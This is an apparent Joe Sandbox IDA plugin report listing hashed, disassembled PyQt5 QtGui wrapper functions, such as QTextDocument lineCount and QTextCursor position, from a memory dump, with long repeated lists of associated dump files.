Opcode ID: da8f611d82748ebdea820eec21723de1dd46223c9bbf2bc53f9221ccc5ced96f
Instruction ID: 973d1fc0554a6d09af4888fdcbf584c70542d393b084042d388821b8be985ee9
Opcode Fuzzy Hash: da8f611d82748ebdea820eec21723de1dd46223c9bbf2bc53f9221ccc5ced96f
Instruction Fuzzy Hash: AA012CB5B08B46D1EB108F74E8486A833A8FB54B84F9140B6CA4D43324DF7DD549C380

Function 00007FFB9A2F5AE0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?lineCount@QTextDocument@@QEBAHXZ.QT5GUI ref: 00007FFB9A2F5B2B
PyLong_FromLong.PYTHON3 ref: 00007FFB9A2F5B33

Strings

lineCount(self) -> int, xrefs: 00007FFB9A2F5B45
lineCount, xrefs: 00007FFB9A2F5B51
QTextDocument, xrefs: 00007FFB9A2F5B58

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?lineCount@Document@@FromLongLong_Text
String ID: QTextDocument$lineCount$lineCount(self) -> int
API String ID: 3258379902-1896213649
Opcode ID: 9e412bc7ef241f319fc6e820cfbf1fcc817a01528f3604dacdac3ffc2ba983e7
Instruction ID: 97c585a6745250fb5b9c9f8dd1663026e005c5df4347689e2042aa30ec0e7fe4
Opcode Fuzzy Hash: 9e412bc7ef241f319fc6e820cfbf1fcc817a01528f3604dacdac3ffc2ba983e7
Instruction Fuzzy Hash: 79012CB5B08A46C1EB109F71E8586A933A8FB54744FA140B2CA4D43320CF7DD949C780

Function 00007FFB9A2FBB40 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?position@QTextCursor@@QEBAHXZ.QT5GUI ref: 00007FFB9A2FBB8B
PyLong_FromLong.PYTHON3 ref: 00007FFB9A2FBB93

Strings

position, xrefs: 00007FFB9A2FBBB1
position(self) -> int, xrefs: 00007FFB9A2FBBA5
QTextCursor, xrefs: 00007FFB9A2FBBB8

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?position@Cursor@@FromLongLong_Text
String ID: QTextCursor$position$position(self) -> int
API String ID: 2913035153-1292035848
Opcode ID: facb01baf3f37abaad323a40f193a153db5753c6434de81d26b321225ef5c25b
Instruction ID: bd9061208ff367ced43948c48df8e94d489f99241a55e3661cb819a96b627908
Opcode Fuzzy Hash: facb01baf3f37abaad323a40f193a153db5753c6434de81d26b321225ef5c25b
Instruction Fuzzy Hash: 9E012CB5B08B56C1EB109F71E8986A933A8FB94794F9140B2CA5D43320DFBDD549C380

Function 00007FFB9A329B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?doubleProperty@QTextFormat@@QEBANH@Z.QT5GUI ref: 00007FFB9A329BA0
PyFloat_FromDouble.PYTHON3 ref: 00007FFB9A329BA6

Strings

QTextCharFormat, xrefs: 00007FFB9A329BCB
fontPointSize, xrefs: 00007FFB9A329BC4
fontPointSize(self) -> float, xrefs: 00007FFB9A329BB8

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?doubleDoubleFloat_Format@@FromProperty@Text
String ID: QTextCharFormat$fontPointSize$fontPointSize(self) -> float
API String ID: 2584946227-1070637524
Opcode ID: cafd996d4196c070e0f89b6d0a58fc5e39b5f276f46bd82ac679ce50e0a6627b
Instruction ID: 745095708716c86b8bcde274e9eca40d306049fdbed3f79963163eb5e04b6c85
Opcode Fuzzy Hash: cafd996d4196c070e0f89b6d0a58fc5e39b5f276f46bd82ac679ce50e0a6627b
Instruction Fuzzy Hash: 7101DAB5A08B46C1EB10DF61E8896A937B8FB54795F9140B6CE5D03320CF7DD659C780

Function 00007FFB9A307B60 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?isTableFormat@QTextFormat@@QEBA_NXZ.QT5GUI ref: 00007FFB9A307BAB
PyBool_FromLong.PYTHON3 ref: 00007FFB9A307BB4

Strings

QTextTableFormat, xrefs: 00007FFB9A307BD9
isValid, xrefs: 00007FFB9A307BD2
isValid(self) -> bool, xrefs: 00007FFB9A307BC6

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Bool_Format@Format@@FromLongTableText
String ID: QTextTableFormat$isValid$isValid(self) -> bool
API String ID: 278077486-1309667952
Opcode ID: 0a2483fea6c28a57448423f8e915eea6136c4027a7dd86fe49c6e12221b86afe
Instruction ID: 4a575dee6e5ae2819fd21138262e3d457c33e79fbeb5c795decfefdbe1fbb160
Opcode Fuzzy Hash: 0a2483fea6c28a57448423f8e915eea6136c4027a7dd86fe49c6e12221b86afe
Instruction Fuzzy Hash: 2D0128B5A08B56D1EB209F31E8886A833A8FB54B45F9140B2CE9D13370DF7CD59AC340

Function 00007FFB9A2FBBD0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30windowCOMMON

Download Yara Rule

APIs

?isVisible@QWindow@@QEBA_NXZ.QT5GUI ref: 00007FFB9A2FBC1B
PyBool_FromLong.PYTHON3 ref: 00007FFB9A2FBC24

Strings

QWindow, xrefs: 00007FFB9A2FBC49
isVisible(self) -> bool, xrefs: 00007FFB9A2FBC36
isVisible, xrefs: 00007FFB9A2FBC42

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Bool_FromLongVisible@Window@@
String ID: QWindow$isVisible$isVisible(self) -> bool
API String ID: 4116707144-221774103
Opcode ID: 5c6bf6fb62ada924df914df944dd0a36186b9932f203c2f6c61bfcbd3d93c42e
Instruction ID: f0460abf4767980de37333545a21810f74fee0baeef89c9f252051b815412ec2
Opcode Fuzzy Hash: 5c6bf6fb62ada924df914df944dd0a36186b9932f203c2f6c61bfcbd3d93c42e
Instruction Fuzzy Hash: B6011AB5A08A56C1EB509F25E8586A933A8FB84B44FA140B2CA5D03320CF7DD599C340

Function 00007FFB9A33BBF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?blockFormatIndex@QTextBlock@@QEBAHXZ.QT5GUI ref: 00007FFB9A33BC3B
PyLong_FromLong.PYTHON3 ref: 00007FFB9A33BC43

Strings

blockFormatIndex, xrefs: 00007FFB9A33BC61
blockFormatIndex(self) -> int, xrefs: 00007FFB9A33BC55
QTextBlock, xrefs: 00007FFB9A33BC68

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?blockBlock@@FormatFromIndex@LongLong_Text
String ID: QTextBlock$blockFormatIndex$blockFormatIndex(self) -> int
API String ID: 2356950037-256987834
Opcode ID: 3aca6f2527676b6646d0a6ef89f06247801905764c31b63f17e4e67c7859b78f
Instruction ID: 631100477f14bec6d4227171a96d3e7e3aa7d7bf64719e8c1650de6f23f5358f
Opcode Fuzzy Hash: 3aca6f2527676b6646d0a6ef89f06247801905764c31b63f17e4e67c7859b78f
Instruction Fuzzy Hash: 2E0128B5B08B46D1EB609F70E8486A833A8FB54B84F9140B6CA4D43320DFBCD64AC380

Function 00007FFB9A311C00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?isSolid@QPen@@QEBA_NXZ.QT5GUI ref: 00007FFB9A311C4B
PyBool_FromLong.PYTHON3 ref: 00007FFB9A311C54

Strings

QPen, xrefs: 00007FFB9A311C79
isSolid, xrefs: 00007FFB9A311C72
isSolid(self) -> bool, xrefs: 00007FFB9A311C66

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Bool_FromLongPen@@Solid@
String ID: QPen$isSolid$isSolid(self) -> bool
API String ID: 1289338498-3635444802
Opcode ID: 8a062b1a5f388ef04afe7ff2de86638f538821326fe79b88aa41bfd7633597a7
Instruction ID: 862b1523c672352e9d096fd529f8ddf20f1be1db339e8c6a512a649a50dd9c94
Opcode Fuzzy Hash: 8a062b1a5f388ef04afe7ff2de86638f538821326fe79b88aa41bfd7633597a7
Instruction Fuzzy Hash: 00017CB1A08B46C0EB10DF31E8486A833A8FB80785FA140B6CE5C03320CF7CD54AC380

Function 00007FFB9A301C10 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?atStart@QTextCursor@@QEBA_NXZ.QT5GUI ref: 00007FFB9A301C5B
PyBool_FromLong.PYTHON3 ref: 00007FFB9A301C64

Strings

atStart, xrefs: 00007FFB9A301C82
atStart(self) -> bool, xrefs: 00007FFB9A301C76
QTextCursor, xrefs: 00007FFB9A301C89

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Bool_Cursor@@FromLongStart@Text
String ID: QTextCursor$atStart$atStart(self) -> bool
API String ID: 1299828547-3033060353
Opcode ID: 96dd7f43f7e3418f2c65cd6abae6e2f5bd1498b57b3d3457512b6b86ce8bd99b
Instruction ID: 301174519155be2da2a77599acd7a3a1fc286993e7f5c436a3ff303f742c15b5
Opcode Fuzzy Hash: 96dd7f43f7e3418f2c65cd6abae6e2f5bd1498b57b3d3457512b6b86ce8bd99b
Instruction Fuzzy Hash: 89012CB5B08A56C1EB10DF61E8986A933A8FB55B85F9140B6CA5C53320CF7DD549C340

Function 00007FFB9A2EBC10 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?pageCount@QTextDocument@@QEBAHXZ.QT5GUI ref: 00007FFB9A2EBC5B
PyLong_FromLong.PYTHON3 ref: 00007FFB9A2EBC63

Strings

pageCount(self) -> int, xrefs: 00007FFB9A2EBC75
QTextDocument, xrefs: 00007FFB9A2EBC88
pageCount, xrefs: 00007FFB9A2EBC81

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?pageCount@Document@@FromLongLong_Text
String ID: QTextDocument$pageCount$pageCount(self) -> int
API String ID: 1736724193-481299524
Opcode ID: 88d7722ae5545a38fb75bfef27660c594cfcf42f700071466113a2d608b5765c
Instruction ID: 89c05be0b2a00825841383d94fdfc37c69da50c6415b0ee2e345af6ca7cf606e
Opcode Fuzzy Hash: 88d7722ae5545a38fb75bfef27660c594cfcf42f700071466113a2d608b5765c
Instruction Fuzzy Hash: 7C01E8B5B08A46C1EB209F71E8986A937A8FB95B44FA140B2CA5D43320DF7DD959C780

Function 00007FFB9A32BC90 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?fontUnderline@QTextCharFormat@@QEBA_NXZ.QT5GUI ref: 00007FFB9A32BCDB
PyBool_FromLong.PYTHON3 ref: 00007FFB9A32BCE4

Strings

QTextCharFormat, xrefs: 00007FFB9A32BD09
fontUnderline, xrefs: 00007FFB9A32BD02
fontUnderline(self) -> bool, xrefs: 00007FFB9A32BCF6

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

